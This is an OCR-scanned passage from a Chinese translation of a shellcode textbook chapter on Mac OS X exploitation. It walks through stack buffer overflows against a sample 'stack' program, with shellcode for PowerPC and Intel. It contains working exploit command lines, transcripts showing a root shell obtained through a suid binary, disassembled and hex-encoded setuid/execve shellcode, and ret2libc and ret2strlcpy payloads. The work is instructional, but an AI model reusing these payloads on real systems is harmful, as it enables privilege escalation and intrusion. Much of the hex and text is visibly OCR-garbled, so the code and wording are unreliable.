"%048x\eb£ \x£a\x04\204") 5 (for ( (i=0;1<40000;i++))do printf 
"\x70\x63\xla\x79"; done;)$(printf 
"\x70\x63\xla\x79\x40\x82\xff£\xfd\x39\x40\x01\x23\x38\x0a\xfe\xf4\x44\xf 
£\xf£\*K02\x60\x60\x60\x60\x7c\xa5\x2a\x79\x7c\x68\x02 \xa6\x38\x63\x01\x5 
4\x38\x63\xfe\xf4\x90\x61\xf£\x£8\x90\eal\xff\xfc\x38\x81\xff\xf8\x3b\xc 
O\x01\x47\x38\xle\xfe\xf4\x44\xfE\xf£f\x02\x7c\xa3\x2b\x7 8\x3b\xc0\x01\x0 
A\x38\xle\xfe\xf4\x44\xff\xff\x02\x2f\x62\x69\x6e\x2f\x73\x68") " 

Illegal instruction 


结果 很 理想 。 再 分 别 用 \xbf\xfb\x04\x04 和 \xbf\xfc\x04\x04 斌 一下， 可 以 得 到 : 
Apple:-/chapter 12 shellcoders$ ./stack "$(printf 

"%048x\xwbf\xfc\x04\x04")$ (for((i=0;i<40000;i++))do printf 
"\x7c\x63\xla\x79"; done;)$(printf 
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"\x70\x63\xla\x79\x40\x82\xf£f£\xfd\x39\x40\x01\x23\x38\x0a\xfe\xf4\x44\xf 
£\xf£\x02\x60\x60\x60\x60\x7c\xa5\x2a\x79\x7c\x68\x02\xa6\x38\x63\x01\x5 
4\x38\x63\xfe\xf4\x90\x61\xf£\xf8\x90\xal\xffi\xfc\x38\x81\xff£\xf8\x3b\xc 
O\x01\x47\x38\xle\xfe\xf4\x44\xff\xff\x02\x7c\xa3\x2b\x78\x3b\xc0\x01\x0 
A\x38\xle\xfe\xf4\x44\xff\xff\x02\x2£\x62\x69\x6e\x2£\x73\x68")" 
Sh-2.05b$ 


RHET! 这 个 shell 成 功 了 。 如 果 程 序 设 有 suid 位 ， 我 们 应 该 会 得 到 一 个 根 shell。 可 以 从 已 有 
的 根 shell 里 为 它 设置 suid 位 : 


Apple: /Users/shellcoders/chapter_12 root# chown root ./stack 
Apple: /Users/shellcoders/chapter_12 root# chmod uts ./stack 


现在 ， 以 普通 用 户 身份 运行 这 个 破解 程序 : 


Apple:~/chapter_12 shellcoders$ whoami 

shellcoders 

Apple:-/chapter 12 shellcoders$ ./stack "$(printf 
"%048x\xbf\xfc\x04\x04")$ (for ( (1=0;1<40000;i++))do printf 
"\x7c\x63\xla\x79"; done;)$(printf 
"\x70\x63\xla\x79\x40\x82\xfEi\xfd\x39\x40\x01\x23\x38\x0a\xfe\xf4\x44\xft 
£\xf£\x02\x60\x60\x60\x60\x7c\xa5\x2a\x79\x7C\x68\x02\xa6\x38\x63\x01\x5 
4\x38\x63\xfe\xf4\x90\x61\xf£\xf8\x90\xal\xfi\xfc\x38\x81\xff\xf8\x3b\xc 
O\x01\x47\x38\xle\xfe\xf4\x44\xff\xff\x02\x7c\xa3\x2b\x78\x3b\xcO\x01\x0 
d\x38\xle\xfe\xf4\x44\xff\xff\x02\x2f\x62\x69\x6e\x2£\x73\x68") " 
sh-2.05b# whoami 

root 

sh-2.05b# 


下 面 做 个 小 结 。PowerPC 上 的 OS X shellcode 与 Linux 上 的 shellcode 有 很 多 类 似 的 地 方 ， 至 少 
从 表面 上 看 是 这 样 。 栈 也 在 类 似 的 位 置 ， 改 写 紧 挨 着 栈 缓冲 区 尾部 的 地 址 可 以 重 定向 执行 流 ， 如 
果 据 此 替换 某 些 样板 shellcode 中 对 应 的 数据 ， 这 些 shellcode 也 应 该 可 以 工作 。 同 样 ， 从 相对 比较 
容易 的 能 被 我 们 利用 的 这 种 “普通 的 ”楼 溢出 中 可 以 看 出 ; 

(1) 没有 栈 cookie; 

(2) 没有 栈 随 机 化 ; 

(3) 栈 是 可 执行 的 。 

至 少 运 行 在 PowerPC 处 理 器 上 的 OS X 是 这 样 的 。 

现在 看 一 下 这 段 代 码 到 底 做 了 些 什 么 。 看 看 用 于 获得 shell 的 B-r00t shellcode: 


0x3014 <ppcshellcode>: xor. r3,r3,r3 

0x3018 «ppcshellcode-«4»: bnel+ 0x3014 <ppcshellcode> 
0x301c <ppcshellcode+8>: li r10,291 

0x3020 «ppcshellcode-«12»: addi r0,r10,-268 

0x3024 <ppcshellcode+i6>: .long 0x44ffff02 

0x3028 <ppcshellcode+20>: ori r0,r3,24672 

0x302c «ppcshellcode-24»: xor. r5,r5,r5 

0x3030 <ppcshellcode+28>: mflr r3 





0x3034 <ppcshellcode+32>: addi r3,r3,340 
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0x3038 <ppcshellcode+36>: addi r3,r3,-268 
0x303c <ppcshellcode+40>: stw r3,-8(ri) 
0x3040 <ppcshellcode+44>: stw r5,-4(r1) 
0x3044 <ppcshellcode+48>: addi r4,xr1,-8 
0x3048 <ppcshellcode+52>: li r30,327 
0x304c <ppcshellcode+56>: addi r0,r30,-268 
0x3050 <ppcshellcode+60>: .long Ox44ffff02 
0x3054 <ppcshellcode+64>: mr r3,xr5 
0x3058 <ppcshellcode+68>: li r30,269 
0x305c <ppcshellcode+72>: addi r0,r30,-268 
0x3060 <ppcshellcode+76>: .long Ox44ffff02 


这 些 指令 乍 一 看 有 些 令 人 费解 ， 但 以 下 事项 需要 记 住 。 

O 在 PowerPC 上 ， 通 常 有 两 个 寄存 器 与 分 支 指令 有 关 。1link 寄 存 器 常用 于 保存 函数 的 保存 的 
返回 地 址 ，count 寄 存 器 常用 于 执行 像 C switch 那 样 的 语句 。 经 常 可 以 看 到 使 用 这 种 方式 的 
blr《 到 link 寄 存 器 的 分 支 ) 和 bctr (到 count 寄 存 器 的 分 支 ) 指令 。 

口 PowerPC 有 32 个 通用 目的 寄存 器 ， 被 依次 命名 为 r0 至 r31。 

O 0x44ffff02 指 令 是 sce〈syscall) 指令 的 非 空 字 节 格式 ， 可 以 看 作 等 同 于 int soxso. 

a 当 指 令 使 用 3 个 参数 时 ， 第 一 个 参数 是 目的 地 址 ， 另 外 两 个 是 参数 ， 比 如 aadi ro, r10, 
-268 指 令 把 r10 加 上 -268 的 结果 保存 在 ro 里 。 

a 在 调用 syscall 时 ，syscall 编 号 保存 在 ro 里。 参数 保 存在 r3 以 上 的 寄存 器 里 。 

a 如 果 syscall 失 败 ， 将 执行 在 它 之 后 的 指令 。 如 果 syscall 成 功 ， 将 跳 过 syscall 指 令 。 

现在 逐 行 分 析 这 个 shellcode。 

(1) 把 r3〈( 第 一 个 syscall 参 数 ) 设 为 0。 

0x3014 «ppcshellcode»: xor. r3,r3,r3 

(2) 这 意味 着 “如 果 不 等 于 0x3014 则 执行 分 支 指令 ” 在 这 里 “不 相等 ”为 “ 假 ” 这 条 指令 

的 副作用 是 把 当前 的 执行 地 址 〈 程 序 计数 寄存 器 ，$pc) 保存 到 link 寄 存 器 里 。 在 这 个 shellcode 的 





后 面 会 用 到 link 寄 存 器 。 
0x3018 <ppcshellcode+4>: bnel+ 0x3014 <ppcshellcode> 
(3) 这 条 指令 把 291 放 到 r10 寄 存 器 里 。 
0x301c <ppcshellcode+8>: li r10,291 


(4) 这 条 指令 把 -268 与 r10 寄 存 器 里 的 值 相 加 ， 并 把 结果 保存 在 ro 里 。 因 此 ， 现 在 在 r3 里 有 
syscall 参 数 0， 在 r0 里 保存 着 syscall 编 号 (291 - 268 =23)。23 是 “setuid” 的 syscall 编 号 。 

0x3020 <ppeshellcode+12>: addi ^ x0, r10,-268 

(5) 现在 调用 syscall。ori 指 令 在 此 只 是 填充 物 。 记 住 ， 如 果 syscall 失 败 ，PowerPC 将 执行 它 ， 
如 果 syscall 成 功 则 会 跳 过 它 。 


0x3024 <ppcshellcode+16>: .long Ox44ffff02 
0x3028 <ppcshellcode+20>: ori r0,r3,24672 


(6) 这 条 指令 清除 r5 寄 存 器 的 内 容 。 
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0x302c <ppcshellcode+24>: xor. r5,r5,r5 

(7) 这 条 指令 把 link 寄 存 器 〈 保 在 在 0x3018 处 ) 移 到 r3 里 。 

0x3030 «ppcshellcode-28»: mflr r3 

(8) 这 条 指令 把 340 与 r3 里 的 值 相 加 ， 并 把 结果 保存 在 r3 里 。 

0x3034 <ppcshellcode+32>: addi r3,r3,340 

(9) 这 条 指令 把 -268 与 r3 里 的 值 相 加 , 并 把 结果 保存 在 r3 里 。 现在, r3 里 的 值 是 72 (340-268 
=72)。72 是 从 0x3018〔 我 们 在 那里 重新 得 到 程序 计数 器 ) 到 shellcode 结 尾 字符 串 /bin/sh 保 存在 


这 里 ) 的 偏 移 量 。 
0x3038 <ppcshellcode+36>: addi r3,r3,-268 
(10) KATO RAE (*1)-8《〈 这 是 待 执行 的 argv[] 参 数 中 的 argv[0] )。 
0x303c <ppcshellcode+40>: stw r3,~8(r1) 
(11) 这 条 指令 把 r5( 空 值 ) 保存 在 (z1)-4 Cargv[112. 
0x3040 <ppcshellcode+44>: stw r5,-4(r1) 
(12) 这 条 指令 把 指向 argv 的 指针 保存 在 r4 里 。 
0x3044 <ppcshellcode+48>: addi r4,r1,-8 
(13) 这 条 指令 把 327 载 入 r30。 
0x3048 <ppcshellcode+52>: li r30,327 


(14) 这 条 指令 把 -268 与 r30 里 的 值 相 加 ， 并 把 结果 保存 在 ro 里 (r0 = 327 - 268 = 59 = 


SYS_execve). 


0x304c «ppcshellcode-56»: addi r0,r30,-268 
(15) 调用 syscall， 不 必 担 心 结 果 。 

0x3050 <ppcshellcode+60>: .long Ox44ffff02 
0x3054 <ppcshellcode+64>: mr r3,x5 

(16) 现在 把 269 载 入 r30。 

0x3058 <ppcshellcode+68>: li r30,269 
(17) 把 -268 与 r30 里 的 值 相 加 ， 并 把 结果 保存 在 ro 里 (ro = 269 - 268 = 1 = SYS exit). 
0x305c <ppcshellcode+72>: addi r0,r30,-268 
(18) 调用 exit() syscall. 

0x3060 <ppcshellcode+76>: .long Ox4A4ffff02 

— BIRR fX RK, shelcode 3 WH: 

setuid(0); 

execve( "/bin/sh" ); 

exit(); 

这 过 程 真 的 很 简单 。 


在 这 段 代码 里 ，B-r00t 使 用 了 几 个 技巧 ， 从 而 避免 在 shellcode 里 出 现 空 字 节 。 第 一 个 技巧 通 
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常 被 称 为 保留 位 混用 。Last Stage of Delirium T 200145£7 H YE. “UNIX Assembly Codes Development 
for Vulnerabilities Illustration Purposes” 论 文中 首次 提 到 这 个 方法 。PowerPC 系 列 里 的 指令 通常 是 
32 位 的 ， 其 中 包含 了 许多 “保留 的 ”位 ， 而 这 些 “ 保 留 的 ”位 通常 被 设 为 0。 然 页， 在 给 定 的 指 
令 中 ， 这 些 位 并 不 一 定 都 需要 设 为 0， 因 为 其 中 的 一 些 在 处 理 器 到 指令 的 映射 中 不 起 作用 。 例如， 
在 前 面 的 代码 里 ， 我 们 用 0x44ffff02 指 令 来 调用 syscall。 真 正 的 sc 指令 对 应 的 是 0x44000002， 
但 实际 上 我 们 用 0xff 替 换 了 中 间 的 两 个 空 字 节 ， 且 这 样 做 并 没有 引发 问题 。 这 对 nop 指 令 
(0x60000000) 来 说 也 是 一 样 的 ， 例 如 ， 可 以 把 它 改 成 0x60606060。 

第 二 个 技巧 是 在 操作 寄存 器 时 避免 出 现 空 字 节 。 注意 , 在 上 面 的 代码 段 里 ， 我 们 频繁 使 用 了 
把 -268 与 一 个 寄存 器 相 加 的 指令 。 不 能 把 寄存 器 设置 成 小 于 256 的 值 或 与 一 个 小 于 256 的 数值 相 
加 ， 确 保 指令 的 “中 间 ” 字 节 位 被 置 位 了 。 例 如 ， 如 果 只 是 执行 adqdi r3,r3,28， 那 程序 将 会 以 
像 0x3863001c 这 样 的 指令 而 结束 (有 一 个 空 字 节 )。 E 

1E 5juninformed 杂志 Chttp://www.uninformed.org/?v=1 &a=1 &t=pdf) 同样 精彩 的 文章 “Mac OS 
X PPC Shellcode Tricks” H , H.D. Moorest 28 T XT PowerPC shellicode 编 程 的 更 深入 的 内 容 。Moore 
提 到 ， 由 于 PowerPC 指 令 的 缓存 行为 ， 为 PowerPC 平 台 编 写 解码 器 时 会 出 现 问题 。 如 果 修 改 内 存 
里 的 可 执行 代码 ， 然 后 再 执行 〈 就 像 写 编码 器 时 那样 的 情形 )， 就 不 能 保证 修改 后 的 代码 会 被 执 
行 , 被 缓存 的 代码 仍 可 能 会 出 现 。 对 应 的 解决 办 法 是 , 使 每 一 个 来 自 数据 缓存 区 的 内 存 块 无 效 ( 使 
用 dbcf 指 令 )。 等 这 些 内 存 块 失效 后 ， 用 icbi 指 令 刷新 块 中 的 指令 缓存 区 ， 最 后 ， 在 执行 代码 之 前 
执行 isync 指 令 。Moore 还 介绍 了 metasploit 框架 中 使 用 的 cache-safe 解 码 器 ， 它 是 以 Dino Dai Zovi 
的 解码 器 为 基础 而 开发 的 。 

总 结 一 下 , 如 果 你 认真 对 待 shellcode (你 已 经 读 到 这 里 了 , 因此 , 我 们 觉得 你 应 该 是 认真 的 )， 
那么 PowerPC shellcode 还 是 值得 了 解 的 。 我 们 在 前 面 的 简单 介绍 已 经 指出 了 一 些 方 法 ， 希 望 这 些 
内 容 能 使 你 在 寻找 与 OS X PowerPC shelicode 相 关 的 方法 时 更 轻松 一 些 。 随 着 时 间 的 推移 ， 如 果 
苹果 公司 遵守 它 关 于 Intel 的 许诺 ，PowerPC Mac 应 该 会 越 来 越 少 。 即 使 如 此 ， 己 有 的 大 量 的 OS X 
PowerPC 机 器 仍然 会 存在 一 段 时 间 ， 如 果 攻 击 一 个 非常 大 的 网 络 ， 则 很 有 可 能 会 碰 到 它们 。 如 果 
偶然 碰 到 了 ， 在 找 不 到 公开 的 利用 代码 时 ， 如 果 能 自己 编写 验证 利用 代码 ， 那 么 会 对 攻击 有 很 大 
帮助 。 希 望 你 有 一 展 身 手 的 机 会 。 下 面 将 介绍 更 常见 的 Intel 平 台 上 的 OS X shellcode。 


12.5 OS X Intel shellcode 
在 2005 年 6 月 ， 苹 果 公 司 宣布 将 在 2007 年 年 底 之 前 将 所 有 新 的 Mac 转 换 到 Intel 处 理 器 上 。 苹 
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D 


D 


D 





D 


直接 跳 到 你 放 在 栈 上 的 代码 里 ， 因 为 许多 利用 代码 实例 就 是 这 样 做 的 。 如 果 你 试图 用 现 
有 的 利用 程序 攻击 Intel 上 的 OSX， 这 将 是 个 问题 。 我 们 稍 后 将 讨论 怎样 解决 这 样 的 问题 。 
syscall 调 用 约定 ，int 0x80。 从 右 至 左 压 入 参数 ， 在 最 后 一 个 参数 后 加 一 个 虚构 的 返回 
地 址 ， 因 为 有 一 个 BSD 风 格 的 虚构 返回 地 址 。 

可 以 用 int 0x80 调 用 syscall。 将 syscall 的 参数 从 右 至 左 压 入 栈 ，syscall 编 号 本 身 保 存在 eax 
里 。 特 别 要 记 住 的 是 ，OS X 预 期 栈 上 有 一 个 “附加 的 ”32 位 值 。 隐 含 的 意思 显然 是 调用 
syscall 就 像 调 用 下 面 这 样 的 stub: 








do_syscall: 
int $0x80 
ret 
很 明显 ， 这 段 代码 把 调用 者 保存 的 返回 地 址 遗留 在 栈 上 了 ， 了 且 在 所 有 的 参数 之 上 ， 因 此 ， 


syscall1 机 制 忽略 了 位 于 栈 上 的 第 一 个 32 位 数值 . 你 可 能 更 喜欢 用 上 面 显示 的 函数 来 编写 
shellcode。 那 么 ， 你 就 可 以 忽略 syscall 机 制 的 这 个 怪癖 并 调用 do_syscall， 而 不 是 执 
ffpush; int $0x80; pop。 这 样 做 的 缺点 是 ， 在 x86 上 没有 “ 短 的 相对 调用 ”之 类 的 指 
令 ， 因 此 ， 你 很 可 能 会 以 一 个 5 字 节 的 调用 指令 来 结束 。 或 者 ， 你 可 以 把 stub 的 地 址 保存 
在 某 个 地 方 ， 然 后 通过 寄存 器 调用 它 ， 虽 然 你 很 可 能 需要 保存 /恢复 这 个 寡 存 器 。 或 者 你 
可 以 随 大 流 ， 只 执行 额外 的 push/pop 。 不 管 怎么 处 理 它 ， 如 果 习 惯 了 在 Linux 上 编号 
shellcode， 这 个 怪癖 可 能 会 把 你 搞 得 稀里糊涂 。 

用 ktrace/kdump 调 试 。 ktrace 和 kdump 是 非常 好 的 编程 助手 , 特别 是 ktrace, 它 上 共有 使 用 -di 
选项 跟随 派生 进程 的 能 力 。Ktrace 会 提供 目标 程序 调用 的 所 有 syscall 列 表 及 其 参数 。 显然 ， 
当 编 写 的 shellcode 包 括 较 多 syscall 时 ， 它 会 很 有 帮助 。 

不 要 忘 了 setuiaq(0)。 如 果 被 利用 的 程序 之 前 以 root 用 户 运 行 , 再 次 运行 时 , 它 将 尝试 CE 
新 ) 获取 root 访 问 。 

如 果 应 用 程序 的 线程 不 止 一 个 ，execve() 将 无 法 执行 。 这 是 OS XX shellcode & BE] PIF 
— 如果 应 用 程序 有 多 个 线程 ， 为 了 成 功 调用 execve ()， 代 码 必 须 执行 一 些 类 似 于 调用 
fork () 之 类 的 指令 。 当 然 ， 如 果 调 用 form() ， 还 需要 保证 父 进程 运行 正常 。 在 某 些 情况 
下 ， 如 果 父 进程 exit () ， 可 能 会 出 现 问题 。 为 此 ， 你 可 能 还 要 调用 wait4()。 为 防 万 一 ， 
调用 setuid(0) 或 许 是 个 不 错 的 主意 。 因 此 , 对 于 移植 性 好 的 shellcode 来 说 , 最 后 的 syscall 


列表 是 setuiqd(0)、fork()、wait4()、execve() 和 exit()。 








12.5.1 shellcode 实例 
下 面 是 一 个 Intel 平台 上 的 execve() shellcode 实 例 。 
jmp start 
do_exit: 
xor eax, eax 
push eax 
inc eax 


push eax 
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int 0x80 // exit(0) 
start: 

xor eax, eax 

push eax 

push eax 

mov al, 23 

int 0x80 // setuid(0) 

pop eax 

inc eax 

inc eax 

int 0x80 // fork() 

pop ebx 

push eax 

push ebx 

push ebx 

push ebx 

push eax 

xor eax, eax 

mov al,7 

push eax 

int 0x80 // wait4( child ) - fails in child 

pop ebx 

pop ebx 

cmp ebx, eax 

je do exit 
do, sh: 

xor eax,eax 

push eax 


push 0x68732£2£f 
push Ox6e69622£ 


mov ebx, esp 

push eax 

push esp 

push esp 

push ebx 

mov al, Ox3b 

push eax 

int 0x80 // execve( '/bin//sh' ) 


或 者 ， 你 可 能 更 喜欢 这 种 形式 ， 
"\xeb\x07\x33\xc0\x50\x40\x50\xcd\x80\x33\xc0\x50\x50\xb0\x17\xcd\x80\x5 
8\x40\x40\xcd\x80\x5b\x50\x53\x53 \x53\x50\x33\xc0\xb0\x07\x50\xcd\x80\x5 
B\xSb\x3b\xd8\x74\xd9\x33\xc0\x50\x68\x2E\x2£\x73 \x68\x68\x2£\x62\x69\x6 
e\x8b\xde\x50\x54\x54\x53\xb0\x3b\x50\xcd\x80" 


12.5.2 ret2libc 


怎样 规避 不 可 执行 栈 呢 ? 第 14 章 将 详细 介绍 这 项 技术 ， 现 在 只 是 尝试 一 些 比较 简单 的 方法 。 
首先 ， 我 们 可 以 尝试 ret2libc。 第 2 章 已 经 介绍 过 了 ， 这 项 技术 要 做 的 是 不 再 返回 我 们 的 shellcode， 
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而 是 简单 地 返回 某 个 可 以 猜 出 其 所 在 位 置 的 库 函数 ， 比 如 system()。 
我 们 将 用 在 PowerPC 节 介绍 的 stack.c 程 序 作为 试验 品 。 当 然 ， 为 了 利于 做 试验 ， 我 们 稍微 


做 了 一 点 改动 : 


// stack.c 


#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 


int main( int argc, char *argv[] ) 
{ 
char buff[ 16 ]; 


printf("buff: Ox%08x\n", buff ); 


if( argo <= 1 ) 
return printf("Error - param expected\n"); 


strepy( (char *)buff, argv[1] ); 


return 0; 
} 
运行 这 段 代 码 ， 可 得 : 
macbook:-/chapter 12 shellcoders$ ./stack $(printf 
"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHITIIIJJJJEKKKKLLLLMMMMNNNNOOOO" ) 
buff: Oxbffffco0 
Segmentation fault 
macbook:-/chapter 12 shellcoderss gdb ./stack 
(gdb) set args $(printf 
"AAAABBBBCCCCDDDDEEREFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO" ) 
(gdb) run 
Starting program: /Users/shellcoders/chapter 12/stack $(printf 
"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO " ) 
Reading symbols for shared libraries . done 
buff: Oxbffffb10 


Program received signal EXC, BAD ACCESS, Could not access memory. 
Reason: KERN INVALID ADDRESS at address: 0x48484848 
0x48484848 in ?? () 


我 们 正在 用 HHHH 必 写 保存 的 返回 地 址 。 注 意 ， 在 调试 它 的 时 候 ，buff 的 地 址 并 不 是 一 成 不 
变 的 。 如 果 你 在 家 做 这 个 试验 ， 一 定 要 根据 环境 的 变化 而 有 所 变通 。 不 过 ,在 同样 的 环境 下 执行 
程序 时 ，buff 的 地 址 应 该 是 一 致 的 。 

如 果 我 们 现在 获得 system 的 地 址 : 


(gdb) info func system 
All functions matching regular expression "system": 
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Non-debugging symbols: 

Ox90046ff0 system 

0x900bd450 new system shared regions 
0x9012ddc8  svcerr systemerr 


现在 需要 设置 栈 ， 使 它 看 起 来 像 下 面 这 样 : 





1 低地 址 

Saved return address system() 

Ret after system() «whatever» 

Argument to system() Address of '/bin/sh' 

Argument /bin/sh 

| 高 地 址 

还 需要 知道 ， 如 果 把 ' /bin/sh' 放 在 字符 串 尾 部 ， 它 在 内 存 里 的 结束 地 方 是 哪里 。 因 为 我 们 
正在 输出 buff 的 地 址 : 


macbook:~/chapter_12 shellcoders$ ./stack $(printf 
"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO " ) 

buff: OxbffffcO0 

可 以 像 前 面 显示 的 那样 构建 字符 串 ， 加 上 0x28 就 是 被 输出 的 缓冲 区 的 地 址 : 
macbook:-/chapter 12 shellcoders$ ./stack $(printf 

" AAAABBBBCCCCDDDDEEEEFFFFGGGG\xf0\x6£\x04\x9 OAAAA\#28\xEc\xf£\xbf/////// 
/11/1/11// f bin/sh") 

buff: Oxbffffc00 

Sh-2.05b$ id 

uid-502(shellcoders) gid-502(shellcoders) groups-502(shellcoders) 
Sh-2.05b$ exit 

exit 

Segmentation fault 

macbook:-/chapter 12 shellcoders$ 


这 就 得 到 shel 了 ， 但 最 后 也 碰 到 了 段 故 障 ， 主 要 原因 是 我 们 太 懒 惰 了 ， 直 接 返 回 了 
0x41414141, 而 没有 做 任何 修改 。 其实, 如 果 稍 微 做 些 整理 , 返回 exit O 或 类 似 的 地 方 就 没事 了 。 


12.5.3 ret2str(l)cpy 

我 们 在 前 面 已 经 解释 过 ret2libc 的 工作 原理 。 那 还 有 更 好 的 方法 可 以 使 选择 的 shelicode 在 指定 
的 地 方 被 执行 吗 ? 当然 , 一 种 类 似 ret2libe 的 方法 就 可 以 做 到 这 一 点 , 人们 通常 把 它 称 为 ret2strcpy。 
这 个 方法 是 返回 strcpy《〈 你 从 名 字 可 能 已 经 看 出 端倪 了 )， 把 〈 不 可 执行 ) 栈 上 的 shellcode 的 地 址 
作为 src 参 数 ， 把 〈 可 执行 ) 堆 上 的 地 址 作为 ast 参 数 传递 给 它 。 


char *strcpy(char * dst, const char * src); 





栈 看 起 来 应 该 像 下 面 这 样 : 

t 低地 址 

Saved return address Address of strcpy() 
Ret after strcpy() Address on heap 
Dest Argument to strcpy() Address on heap 


Src Argument to strcpy() Address of our shellcode on stack 


262 % 12% OSX shellcode 


<shellcode> 
I 高 地 址 
我 们 的 设计 里 有 一 个 小 问题 ， 它 产生 的 strcpy() 地 址 中 包含 一 个 空 字 节 : 


(gdb) info func strcpy 
0x90002540 strcpy 


因此 用 strlcpy 替 换 strcpy: 


(gdb) info func strlcpy 
0x900338f0 stricpy 


strlcpy 的 原型 如 下 : 


size_t stricpy(char *dst, const char *src, size_t size); 


唯一 需要 做 的 修改 是 ， 把 strlcpy 的 第 3 个 参数 (要 复制 的 最 大 字 节 数 ) 放 在 栈 上 src 参 数 之 


后 ， 最 后 ， 栈 布局 变 成 了 : 


t 低地 址 

Saved return address Strlcpy() 
Ret after strcpy() Address on heap 
Dest Argument to strcpy() Address on heap 
Src Argument to strcpy() Address of our shellcode on stack 
Size argument to strlcpy 0x01010101 
<shellcode> 

| 高 地 址 


注意 ，size 参 数 是 要 复制 的 最 大 字 节 数 。 因 为 只 用 复制 几 十 个 字 节 ， 所 以 把 它 设 成 什么 都 


不 重要 。 我 们 选择 的 是 最 小 的 非 空 值 0x01010101。 


我 们 还 需要 挑 一 个 合适 的 堆 地 址 (确切 地 说 ， 就 是 不 包含 空 字 节 的 地 址 )。 检 查 在 stack 上 


的 vmmap 的 输出 ， 可 以 看 到 : 


MALLOC 01800000-02008000 [ 8224K] rw-/rwx SM=PRV 
DefaultMallocZzone 0x300000 


看 起 来 地 址 0x01810101 很 合适 。 


如 前 文 所 述 ， 我 们 的 shellcode 如 下 : 
"\xeb\x07\x33\xc0\x50\x40\x50\xcd\x80\x33\xcO\x50\x50\xbO\K17\xcd\x80\x5 
8\x40\x40\xcd\x80\x5b\x50\x53\x53\x53\x50\x33\xc0\xb0\x07\x50\xcd\x80\x5 
b\xSb\x3b\xd8\x74\xd9\x33\xc0\x50\x68\x2£\x2£\x73\x68\x68\x2£\x62\x69\x6 
e\x8b\xde\x50\x54\x54\x53\xb0\x3b\x50\xcd\x80" 


也 可 以 在 前 面 放 一 些 nops， 从 而 使 目标 更 容易 被 命中 。 最 后 ， 代 码 将 像 下 面 这 样 : 


./stack <padding><stricpy><heap><heap><shellcode address><size arg» 
<shellcode> 


macbook:~/chapter_12 shellcoders$ ./stack S$(printf 

" AAAABBBBCCCCDDDDEEEEFFFFGGGG \x£0 \3 8 \x03 \290\201\2201\281\201\201\201\x8 
L\x01\xc0 \xfb\xff \xbf \x01\201\x01\x01\x90\x90\K90\xK90\xK90\x90\x90\x90\xe 
b\x07\x33\xc0\x50\x40\x50\xcd\x80\x33\xc0\x50\x50\xb0\x17\xcd\x80\x58\x4 
0\x40\xcd\x80\x5b\x50\x53\x53\x53\x50\x33\xcO\xb0\x07\x50\xcd\x80\x5b\x5 
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b\x3b\xd8\x74\xd9\x33\xc0\x50\x68\x2£\x2£\x73\x68\x68\x2£\x62\x69\x6e\x8 
b\xdc\x50\x54\x54\x53\xb0\x3b\x50\xcd\x80") 

buff: Oxbffffb90 

macbook: /Users/shellcoders/chapter_12 shellcoderss id 
uid=502(shellcoders) gid=502(shellcoders) groups=502 (shellcoders) 
macbook: /Users/shellcoders/chapter_12 shellcoders$ exit 

exit 

macbook:~/chapter_12 shellcoders$ 


相关 地 址 和 参数 都 用 粗 体 标 出 来 了 。 记 住 ， 因 为 ntel 芯 片 是 little-endian 的 ，4 字 节 的 双 字 将 
以 逆序 出 现 ， 因 此 ，0x900338f£f0 变 成 了 \xf0\x38\x03\x90。 地 址 是 : 

0x900338£0— —strlcpy 

0x01810101 一 一 堆 地 址 (942) 


0xbffffbc0 一 一 栈 上 的 shellcode 地 址 
0x01010101 一 一 strlcpy 对 应 的 “大 小 ”参数 


前 面 是 nop 滑 道 〈8 个 0x90 字 节 )， 其 后 是 我 们 的 shellcode。 

希望 通过 我 们 在 前 面 的 说 明 ， 你 已 经 了 解 了 OS X 上 的 不 可 执行 栈 对 我 们 来 说 并 不 是 什么 大 
问题 ， 这 要 感谢 可 执行 堆 ， 以 及 OS X 在 地 址 方面 一 贯 的 稳定 性 。 

从 理论 上 讲 ， 把 多 个 代码 块 链 在 一 起 作为 一 串 “ 返 回 值 ” 是 可 能 的 ， 但 是 当 必 须要 在 栈 上 放 
置 空 字 节 时 ， 就 会 出 现 问 题 ， 因 为 空 字 节 通常 会 终止 字符 串 。 我 们 希望 能 做 到 : 在 栈 上 创建 任何 
我 们 选择 的 数据 ， 包 括 空 字 节 ， 然 后 “返回 ” 它 。 有 很 多 方法 都 可 以 做 到 ， 其 中 包括 ret2sscanf。 

通常 所 以 像 下 面 这 样 调用 sscanf: 


sscanf( "100 200 300 400", "Sd %d %d Sd", Ox11111111, 0x22222222, 
0x33333333, 0x44444444 ); 


它 将 把 十 进 制 数 100、200、300 和 400 分 别 写 到 地 址 0x11111111、0x22222222、0x33333333 
和 0x44444444 里 。 最 不 可 思议 的 是 ， 我 们 可 以 向 任意 地 址 〈 可 以 不 用 空 字 节 表 示 的 ) 写 入 任意 
E (包括 空 字 节 )。 实 际 上 ， 这 为 我 们 提供 了 非常 简单 的 “可 以 在 任意 地 址 写 任意 值 ” 原 语 ， 利 
用 sscanf， 我 们 可 以 构造 一 连 串 用 于 返回 的 函数 调用 。 在 OS X 上 ，mprotect 和 vm_protect 是 非 
常 好 的 选择 ， 因 为 它们 可 以 产生 一 个 可 执行 的 内 存 区 域 。 
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在 利用 OS X 平 台 上 的 bug 时 ， 最 棒 的 莫 过 于 ， 写 一 个 在 PowerPC 和 IJntel 平 台 上 都 可 以 良好 工 
作 的 利用 程序 。 

在 2005 Ruxcon 大 会 上 ，Neil Archibald 和 Ilja van Sprundel 在 他 们 的 “Breaking Mac OS X" 7r 
绍 里 面 提 到 了 可 以 达成 这 个 目标 的 技术 〈 在 http:/felinemenace.org/papers/breaking_mac osx.ppt 可 
以 找到 这 个 介绍 )。 

这 个 技术 主要 借鉴 了 Phrack 杂 志 〈( 第 57 期 ) 里 描述 的 内 容 。 这 个 技术 的 要 点 是 : 你 需要 寻找 
一 条 指令 ， 它 在 一 个 平台 上 是 jmp 类 型 ， 但 在 另 一 个 〈 些 ) 平台 上 等 价 于 nop。 因 此 ， 在 OSX 上 ， 
你 的 缓冲 区 可 能 会 被 布置 成 下 面 这 样 : 
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<nop on both> 

<nop on both> 

<nop on both> 

<nop on ppc, jmp to Start on intel> 
<ppc shellcode> 

Start: <Intel shellcode> 


Neil 和 Tja 在 他 们 的 介绍 里 指出 32 位 指令 
Oxfcfcfcfe 
